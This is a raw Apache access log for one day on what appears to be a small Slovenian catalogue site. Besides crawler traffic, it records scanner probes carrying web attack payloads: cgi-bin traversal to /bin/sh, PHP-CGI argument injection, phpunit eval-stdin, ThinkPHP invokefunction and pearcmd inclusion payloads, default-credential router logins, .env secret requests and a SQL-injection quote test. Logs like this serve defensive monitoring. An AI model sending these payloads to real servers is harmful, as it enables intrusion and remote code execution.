66.249.66.43 - - [01/Oct/2024:00:02:12 +0200] "GET /info.php?sifra=kos%20001&skupina=0 HTTP/1.1" 200 17389 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
64.23.243.224 - - [01/Oct/2024:00:53:56 +0200] "\x16\x03\x01" 200 20819 "-" "-"
64.23.243.224 - - [01/Oct/2024:00:53:57 +0200] "\x16\x03\x01" 200 20819 "-" "-"
64.23.243.224 - - [01/Oct/2024:00:53:57 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.23.243.224 - - [01/Oct/2024:00:53:58 +0200] "GET /form.html HTTP/1.1" 404 - "-" "curl/8.1.2"
64.23.243.224 - - [01/Oct/2024:00:53:58 +0200] "GET /upl.php HTTP/1.1" 404 - "-" "Mozilla/5.0"
64.23.243.224 - - [01/Oct/2024:00:53:58 +0200] "GET /t4 HTTP/1.1" 404 - "-" "Mozilla/5.0"
64.23.243.224 - - [01/Oct/2024:00:53:59 +0200] "GET /geoip/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.23.243.224 - - [01/Oct/2024:00:53:59 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.23.243.224 - - [01/Oct/2024:00:53:59 +0200] "GET /1.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.23.243.224 - - [01/Oct/2024:00:54:00 +0200] "GET /systembc/password.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.23.243.224 - - [01/Oct/2024:00:54:00 +0200] "GET /password.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
66.249.66.42 - - [01/Oct/2024:01:24:44 +0200] "GET /skupine.php?skupina=100&stran=2 HTTP/1.1" 200 25538 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
162.216.150.163 - - [01/Oct/2024:01:41:48 +0200] "GET / HTTP/1.1" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
66.249.66.44 - - [01/Oct/2024:01:55:30 +0200] "GET /info.php?sifra=52564&skupina=0 HTTP/1.1" 200 17183 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
41.233.91.132 - - [01/Oct/2024:01:55:41 +0200] "GET /" 400 474 "-" "-"
66.249.66.44 - - [01/Oct/2024:01:59:22 +0200] "GET /info.php?sifra=HDEm180HW&skupina=82 HTTP/1.1" 200 20292 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [01/Oct/2024:02:37:09 +0200] "GET /slike/IMG_2249-3.JPG HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
197.58.150.8 - - [01/Oct/2024:02:56:08 +0200] "GET /" 400 474 "-" "-"
167.94.138.127 - - [01/Oct/2024:03:52:37 +0200] "GET / HTTP/1.1" 200 20819 "-" "-"
167.94.138.127 - - [01/Oct/2024:03:52:43 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.127 - - [01/Oct/2024:03:52:53 +0200] "PRI * HTTP/2.0" 400 226 "-" "-"
66.249.66.42 - - [01/Oct/2024:04:21:20 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [01/Oct/2024:04:21:20 +0200] "GET /skupine.php?skupina=34 HTTP/1.1" 200 25579 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
34.209.251.76 - - [01/Oct/2024:04:25:05 +0200] "OPTIONS / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
167.94.138.35 - - [01/Oct/2024:04:27:43 +0200] "GET / HTTP/1.1" 200 20819 "-" "-"
167.94.138.35 - - [01/Oct/2024:04:27:49 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.35 - - [01/Oct/2024:04:27:51 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.35 - - [01/Oct/2024:04:27:53 +0200] "PRI * HTTP/2.0" 400 226 "-" "-"
66.249.66.42 - - [01/Oct/2024:04:37:18 +0200] "GET /skupine.php?skupina=42&stran=5 HTTP/1.1" 200 19904 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.117.241.82 - - [01/Oct/2024:04:42:42 +0200] "GET / HTTP/1.1" 200 20819 "-" "-"
156.204.249.227 - - [01/Oct/2024:04:57:53 +0200] "GET /" 400 474 "-" "-"
66.249.66.42 - - [01/Oct/2024:05:14:12 +0200] "GET /info.php?sifra=559510&skupina=40 HTTP/1.1" 200 17551 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.147.199.99 - - [01/Oct/2024:05:24:44 +0200] "GET / HTTP/1.0" 200 20819 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
66.249.66.44 - - [01/Oct/2024:05:33:25 +0200] "GET /info.php?sifra=D120IBBI&skupina=39 HTTP/1.1" 200 17873 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.133.163.164 - - [01/Oct/2024:06:13:26 +0200] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
36.133.163.164 - - [01/Oct/2024:06:13:27 +0200] "POST / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
36.133.163.164 - - [01/Oct/2024:06:13:28 +0200] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
36.133.163.164 - - [01/Oct/2024:06:13:29 +0200] "POST / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
104.248.67.255 - - [01/Oct/2024:06:47:25 +0200] "GET /ab2g HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
104.248.67.255 - - [01/Oct/2024:06:47:25 +0200] "GET /ab2h HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
104.248.67.255 - - [01/Oct/2024:06:47:26 +0200] "GET /alive.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.67.255 - - [01/Oct/2024:06:47:30 +0200] "GET /" 400 474 "-" "-"
104.248.67.255 - - [01/Oct/2024:06:47:31 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.67.255 - - [01/Oct/2024:06:47:31 +0200] "GET /" 400 474 "-" "-"
104.248.67.255 - - [01/Oct/2024:06:47:32 +0200] "GET /t4 HTTP/1.1" 404 - "-" "Mozilla/5.0"
104.248.67.255 - - [01/Oct/2024:06:47:32 +0200] "GET /" 400 474 "-" "-"
104.248.67.255 - - [01/Oct/2024:06:47:33 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.248.67.255 - - [01/Oct/2024:06:47:34 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
104.248.67.255 - - [01/Oct/2024:06:47:34 +0200] "GET /teorema505?t=1 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
41.237.118.96 - - [01/Oct/2024:07:00:23 +0200] "GET /" 400 474 "-" "-"
41.237.118.96 - - [01/Oct/2024:07:01:06 +0200] "GET /" 400 474 "-" "-"
66.249.66.43 - - [01/Oct/2024:07:04:25 +0200] "GET /info.php?sifra=kos002&skupina=133 HTTP/1.1" 200 17456 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
197.39.74.92 - - [01/Oct/2024:07:27:32 +0200] "GET /" 400 474 "-" "-"
117.198.12.147 - - [01/Oct/2024:08:00:01 +0200] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 - "-" "-"
66.249.66.44 - - [01/Oct/2024:08:07:11 +0200] "GET /info.php?sifra=HDEM135&skupina=82 HTTP/1.1" 200 19400 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [01/Oct/2024:08:11:52 +0200] "GET /skupine.php?skupina=63 HTTP/1.1" 200 24964 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [01/Oct/2024:08:47:35 +0200] "GET /info.php?sifra=V135&skupina=0 HTTP/1.1" 200 17161 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [01/Oct/2024:09:35:19 +0200] "GET /kako.php HTTP/1.1" 200 18336 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
59.178.144.221 - - [01/Oct/2024:09:37:59 +0200] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 - "-" "-"
107.175.242.95 - - [01/Oct/2024:09:54:59 +0200] "POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
66.249.66.42 - - [01/Oct/2024:10:17:29 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.41 - - [01/Oct/2024:10:17:29 +0200] "GET /info.php?sifra=HDEM105m&skupina=82 HTTP/1.1" 200 19107 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.207.242.158 - - [01/Oct/2024:10:19:59 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/98.0.4758.132 Safari/537.36"
156.220.64.77 - - [01/Oct/2024:11:04:05 +0200] "GET /" 400 474 "-" "-"
66.249.66.42 - - [01/Oct/2024:11:35:19 +0200] "GET /info.php?sifra=E260&skupina=83 HTTP/1.1" 200 18961 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [01/Oct/2024:11:35:20 +0200] "GET /info.php?sifra=E650&skupina=83 HTTP/1.1" 200 18919 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [01/Oct/2024:11:40:30 +0200] "GET /info.php?sifra=4RP/S&skupina=31 HTTP/1.1" 200 17740 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [01/Oct/2024:12:03:29 +0200] "GET /slike/MC2131_260.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
41.233.30.5 - - [01/Oct/2024:12:49:12 +0200] "GET /" 400 474 "-" "-"
162.216.149.239 - - [01/Oct/2024:13:22:11 +0200] "GET / HTTP/1.1" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
84.0.95.140 - - [01/Oct/2024:14:22:02 +0200] "GET / HTTP/1.0" 200 8230 "-" "-"
197.55.250.138 - - [01/Oct/2024:14:26:19 +0200] "GET /" 400 474 "-" "-"
120.195.30.140 - - [01/Oct/2024:15:27:02 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 226 "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:05 +0200] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 226 "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:07 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:08 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:09 +0200] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:09 +0200] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:10 +0200] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:10 +0200] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:11 +0200] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:11 +0200] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:12 +0200] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:12 +0200] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:13 +0200] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:13 +0200] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:14 +0200] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:15 +0200] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:16 +0200] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:16 +0200] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:17 +0200] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:17 +0200] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:18 +0200] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:18 +0200] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:19 +0200] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:20 +0200] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:20 +0200] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:21 +0200] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:21 +0200] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:22 +0200] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:23 +0200] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:24 +0200] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:24 +0200] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:25 +0200] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:25 +0200] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:26 +0200] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:27 +0200] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:27 +0200] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:28 +0200] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:29 +0200] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:29 +0200] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:30 +0200] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:31 +0200] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 20819 "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:34 +0200] "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:34 +0200] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php HTTP/1.1" 200 20819 "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:39 +0200] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 20819 "-" "Custom-AsyncHttpClient"
66.249.66.42 - - [01/Oct/2024:15:51:27 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [01/Oct/2024:15:51:33 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Googlebot-Image/1.0"
66.249.66.42 - - [01/Oct/2024:16:07:46 +0200] "GET /info.php?sifra=HDEM105m&skupina=86 HTTP/1.1" 200 19181 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
197.46.183.205 - - [01/Oct/2024:17:16:23 +0200] "GET /" 400 474 "-" "-"
66.249.66.44 - - [01/Oct/2024:17:39:38 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [01/Oct/2024:17:39:38 +0200] "GET /skupine.php?skupina=105 HTTP/1.1" 200 18656 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
167.94.145.110 - - [01/Oct/2024:18:15:49 +0200] "GET / HTTP/1.1" 200 20819 "-" "-"
167.94.145.110 - - [01/Oct/2024:18:15:52 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.110 - - [01/Oct/2024:18:15:52 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.110 - - [01/Oct/2024:18:15:52 +0200] "PRI * HTTP/2.0" 400 226 "-" "-"
138.246.253.24 - - [01/Oct/2024:18:34:09 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36"
66.249.66.43 - - [01/Oct/2024:18:49:39 +0200] "GET /skupine.php?skupina=82&stran=5 HTTP/1.1" 200 27860 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [01/Oct/2024:19:03:43 +0200] "GET /skupine.php?skupina=100&stran=2 HTTP/1.1" 200 25538 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.244.66.244 - - [01/Oct/2024:19:08:32 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
66.249.66.44 - - [01/Oct/2024:19:12:38 +0200] "GET /info.php?sifra=13.092&skupina=38 HTTP/1.1" 200 17962 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [01/Oct/2024:19:36:11 +0200] "GET /style.css HTTP/1.1" 200 11488 "http://212.44.99.48/info.php?sifra=13.092&skupina=38" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.217.82.205 - - [01/Oct/2024:20:20:22 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
20.217.82.205 - - [01/Oct/2024:20:20:22 +0200] "GET //skupine.php?skupina=31%27 HTTP/1.1" 200 13088 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
